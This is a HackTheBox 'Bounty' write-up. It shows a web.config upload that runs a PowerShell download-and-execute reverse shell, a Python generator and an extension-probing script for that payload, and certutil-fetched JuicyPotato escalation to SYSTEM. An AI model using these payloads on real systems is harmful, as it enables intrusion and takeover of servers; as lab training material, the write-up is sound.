
HackTheBox - Bounty Writeup

tags: `writeup` `HackTheBox` `Bounty` `aspx` `IIS` `JuicyPotato` `Easy` `OSCP`

Port Scanning

# Nmap 7.92 scan initiated Sat May 28 05:48:07 2022 as: nmap -sV -T4 -sS -v -sC -p- -Pn -oN ports 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.034s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 28 05:49:46 2022 -- 1 IP address (1 host up) scanned in 98.11 seconds

Only one port is open: 80/tcp, running IIS 7.5 (the version that ships with Windows Server 2008 R2), so everything has to come from enumerating this web server. Note that the other 65534 ports are filtered rather than closed, which is why the scan uses -Pn.

Enumeration

Browsing to the site, all we see is a single image.


Now it's time to fuzz the site. I normally use ffuf; because this is an IIS server, add the extensions IIS actually serves (.aspx, .asp, .config) rather than the usual .php. The command below uses the bounty.htb name, so add it to /etc/hosts first.

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bounty.htb/FUZZ -fc 404,505,500 -t 100 -e=.aspx,.txt,.log,.jpg,.png | tee directories


After a few minutes the fuzzer finds a page that lets us upload files.

Exploitation

The upload form filters by file extension:


To find out which extensions the site accepts, we use Burp Suite's Intruder.

Capture the request that is sent when we hit the upload button, mark the extension in the uploaded filename as the payload position, and feed Intruder a list of extensions from SecLists.

Here is the link of the repository:
https://github.com/danielmiessler/SecLists

To install it on Kali:

sudo apt install seclists

This is the wordlist we will use in Burp Suite:

/usr/share/seclists/Discovery/Web-Content/raft-small-extensions-lowercase.txt

Open Burp Suite and point Firefox at its proxy:


Select a file with an extension the page rejects, such as .php.


When the request shows up in the proxy, send it to Intruder.


Click Clear, mark only the extension as the payload position, then in the Payloads tab load the wordlist mentioned above.


It will look like this.

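The same extension probe can be scripted instead of clicking through Intruder. The block below is an added example written for this writeup, not code from the original post. It assumes, as placeholders that must be replaced with the values seen in the captured Burp request, that the upload page is UPLOAD_URL, that it is an ASP.NET WebForms page whose hidden inputs (__VIEWSTATE and friends) have to be echoed back, that the file input is called FILE_FIELD and the submit button SUBMIT_FIELD. Only the parsing, multipart-encoding and grouping helpers run offline; the HTTP part needs the target.

```python
"""Script the Burp Intruder extension probe: upload probe<ext> for every
extension in a wordlist and group the responses, so the accepted extensions
stand out the same way sorting Intruder results by length does.

Placeholders (assumptions, not from the writeup): UPLOAD_URL, FILE_FIELD,
SUBMIT_FIELD. The wordlist path is the one used in the writeup."""
import sys
import uuid
import urllib.error
import urllib.request
from collections import defaultdict
from html.parser import HTMLParser

UPLOAD_URL = "http://bounty.htb/upload.aspx"   # placeholder: real upload page
FILE_FIELD = "FileUpload1"                      # placeholder: name of the file input
SUBMIT_FIELD = {"btnUpload": "Upload"}          # placeholder: submit button field
WORDLIST = "/usr/share/seclists/Discovery/Web-Content/raft-small-extensions-lowercase.txt"


class _HiddenInputs(HTMLParser):
    """Collect name/value of every <input type="hidden"> on the page."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def hidden_fields(html: str) -> dict:
    """Return the hidden form fields; WebForms rejects a POST without its __VIEWSTATE."""
    parser = _HiddenInputs()
    parser.feed(html)
    return parser.fields


def build_multipart(fields: dict, file_field: str, filename: str, content: bytes):
    """Encode text fields plus one file as multipart/form-data.
    Returns (body, value for the Content-Type header)."""
    boundary = uuid.uuid4().hex
    chunks = []
    for name, value in fields.items():
        chunks.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
                      f'\r\n\r\n{value}\r\n'.encode())
    chunks.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
                  f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n'
                  .encode() + content + b"\r\n")
    chunks.append(f"--{boundary}--\r\n".encode())
    return b"".join(chunks), f"multipart/form-data; boundary={boundary}"


def probe_extensions(url: str, extensions, content: bytes = b"probe") -> dict:
    """Upload probe<ext> for each extension (entries in the raft list start with a dot)
    and return {ext: (status, response_length)}."""
    with urllib.request.urlopen(url) as resp:
        fields = hidden_fields(resp.read().decode("utf-8", "replace"))
    fields.update(SUBMIT_FIELD)
    results = {}
    for ext in extensions:
        body, ctype = build_multipart(fields, FILE_FIELD, "probe" + ext, content)
        req = urllib.request.Request(url, data=body, headers={"Content-Type": ctype})
        try:
            with urllib.request.urlopen(req) as resp:
                results[ext] = (resp.status, len(resp.read()))
        except urllib.error.HTTPError as err:
            results[ext] = (err.code, len(err.read()))
    return results


def group_by_response(results: dict) -> dict:
    """Group extensions by (status, length); the small groups are the interesting ones."""
    groups = defaultdict(list)
    for ext, key in results.items():
        groups[key].append(ext)
    return dict(groups)


if __name__ == "__main__":
    with open(sys.argv[1] if len(sys.argv) > 1 else WORDLIST) as fh:
        exts = [line.strip() for line in fh if line.strip()]
    grouped = group_by_response(probe_extensions(UPLOAD_URL, exts))
    for key, members in sorted(grouped.items(), key=lambda kv: len(kv[1])):
        print(f"status={key[0]} length={key[1]:6d} ({len(members)} ext): {' '.join(members[:15])}")
```

Run it with the wordlist as the only argument; the rejected extensions all land in one large group with identical status and length, and anything the server treats differently shows up as a small group at the top of the output.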

None of the extensions in that list came back with a different response. Searching further, the IIS section of HackTricks points at the web.config trick (originally written up by Soroush Dalili): IIS applies any web.config it finds in a directory it serves, so an uploaded one can add a handler mapping that sends *.config files (including itself) to the classic ASP engine and remove the request-filtering rules that normally block .config files and hide web.config. The ASP code is placed inside an XML comment, so the configuration system still parses the file as valid XML while asp.dll executes the <% %> block when the file is requested. The proof of concept runs whoami; we replace that with a PowerShell one-liner that downloads the reverse shell from a web server we will host on port 80.

This is the modified web.config, which downloads and executes the PowerShell reverse shell:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <!-- Map every *.config file (this one included) to the classic ASP ISAPI handler -->
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <!-- Request filtering normally blocks .config and hides web.config; undo both -->
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
   </appSettings>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.10/Invoke-PowerShellTcp.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
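Hand-editing this file is error-prone: the configuration part has to stay well-formed XML, and the ASP block must not contain a double dash or it terminates the comment early (which is why the original writes "-"&"->" instead of "-->"). The following is an added example, my own code rather than the writeup's, that generates the payload from the attacker IP and script name and checks the properties IIS relies on before it will execute the file. LHOST 10.10.14.10, the port-80 web server and the nishang script name come from the writeup; the function names and checks are mine.

```python
"""Generate the web.config payload and sanity-check it offline.

Taken from the writeup: LHOST and the nishang script name.
Mine (assumptions): every function and the names of the checks."""
import xml.etree.ElementTree as ET

LHOST = "10.10.14.10"
PS1_NAME = "Invoke-PowerShellTcp.ps1"

# Directory-level IIS configuration: map *.config (this file included) to the
# classic ASP ISAPI handler and undo the two request-filtering defaults that
# would otherwise make web.config unreachable over HTTP.
CONFIG_PART = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>
"""

# Classic ASP hidden in an XML comment: the config parser skips it, asp.dll runs
# it. ASP echoes the literal "<!--" to the client first, so the script emits "-->"
# straight away, built as "-"&"->" so the XML comment itself never contains "--".
ASP_PART = """<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c {command}")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
"""


def reverse_shell_command(lhost: str = LHOST, ps1: str = PS1_NAME) -> str:
    """The writeup's one-liner: fetch the nishang script and run it in memory."""
    return ("powershell.exe -c iex(new-object net.webclient)"
            f".downloadstring('http://{lhost}/{ps1}')")


def build_web_config(command: str) -> str:
    """Return the full web.config that runs `command` through cmd.exe /c."""
    if '"' in command:
        raise ValueError("command sits inside a VBScript string literal; use single quotes")
    if "--" in command:
        raise ValueError("'--' would end the XML comment and break the config parse")
    return CONFIG_PART + ASP_PART.format(command=command)


def validate_web_config(text: str) -> dict:
    """Check the parts IIS relies on; ET.fromstring raises if the XML is not well-formed."""
    root = ET.fromstring(text.encode("utf-8"))
    webserver = next(child for child in root if child.tag == "system.webServer")
    handler = webserver.find("handlers/add")
    filtering = webserver.find("security/requestFiltering")
    comment = text[text.rfind("<!--") + 4:text.rfind("-->")]
    return {
        "handler_runs_config_as_asp": handler is not None
            and handler.get("path") == "*.config"
            and handler.get("scriptProcessor", "").lower().endswith("asp.dll"),
        "config_extension_allowed": any(r.get("fileExtension") == ".config"
                                        for r in filtering.findall("fileExtensions/remove")),
        "web_config_not_hidden": any(r.get("segment") == "web.config"
                                     for r in filtering.findall("hiddenSegments/remove")),
        "asp_block_inside_comment": "<%" in comment and "%>" in comment,
        "comment_has_no_double_dash": "--" not in comment,
    }


if __name__ == "__main__":
    cfg = build_web_config(reverse_shell_command())
    print(validate_web_config(cfg))
    with open("web.config", "w", newline="") as fh:
        fh.write(cfg)
```

Running the script writes web.config to the current directory and prints the check results; every entry should be True before the file is uploaded. Swap the command for anything else (whoami, a certutil download) as long as it avoids double quotes and double dashes.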

The PowerShell script we use is Invoke-PowerShellTcp.ps1 from nishang. The file only defines the function, so we append one line at the end that calls it and sends the reverse shell to our IP:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 4444

The end of the file then looks like this:


Save the file and start a Python web server on port 80 (the port used in the web.config URL) in the same folder as Invoke-PowerShellTcp.ps1:

python3 -m http.server 80


Start a netcat listener on the port the nishang script connects back to. Wrapping nc in rlwrap gives the shell line editing and command history; it does not turn it into a real TTY, so some interactive programs will still misbehave.

rlwrap nc -nlvp 4444


Next we upload web.config through the form and then request it from the directory where the uploads are stored, so that IIS executes it.


The Python web server then receives a GET request for the script:


And we receive the shell.


Now it's time to Privesc!


⏫Root Privesc

The first things to check are systeminfo and the token privileges (whoami /priv):


The box is Windows Server 2008 R2 Datacenter and the account we landed as holds SeImpersonatePrivilege, so JuicyPotato is the obvious route: it abuses that privilege to impersonate a SYSTEM token obtained through a DCOM activation, and the technique still works on Server 2008 R2 (Microsoft only broke it in Windows 10 1809 / Server 2019).

To get a SYSTEM reverse shell we need:

  • The JuicyPotato binary
  • The Python web server still serving the PowerShell reverse shell script
  • A fresh netcat listener on port 4444, since the script will connect back to the same port as before

To get JuicyPotato onto the box, fetch it from our web server with certutil:

certutil -urlcache -f http://10.10.14.10/JuicyPotato.exe JC.exe

Running it without arguments prints the usage:


Passing the PowerShell one-liner to JuicyPotato directly can fail, so wrap it in a .bat file and point -p at the batch file instead.


rev.bat contains the same one-liner used in web.config:

powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.10/Invoke-PowerShellTcp.ps1')

In my case it worked on the first try, but you may need to run it a few times.

What each parameter does:

-l is the port JuicyPotato's COM server listens on. Any free port works; I used 1337 because it's a haxorz number :).

-t selects how the process is spawned with the SYSTEM token: t uses CreateProcessWithTokenW, u uses CreateProcessAsUser, and * tries both.

-c is the CLSID of the COM server to abuse. JuicyPotato defaults to the BITS CLSID, which fails on this box, so we pick another one from the list below.

-p is the program to launch (use the full path to rev.bat); -a would pass it arguments.

So the invocation combines -l 1337, -t *, -c with a CLSID from the list, and -p with the path to rev.bat. Keep in mind that the default CLSID will not work here, so try entries from the Server 2008 R2 list until one gives a shell:

https://github.com/decoder-it/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise

After that we receive a shell as NT AUTHORITY\SYSTEM.

And that's it, we have root and the machine is finished!


You can find me on: Twitter, GitHub, TryHackMe, HackTheBox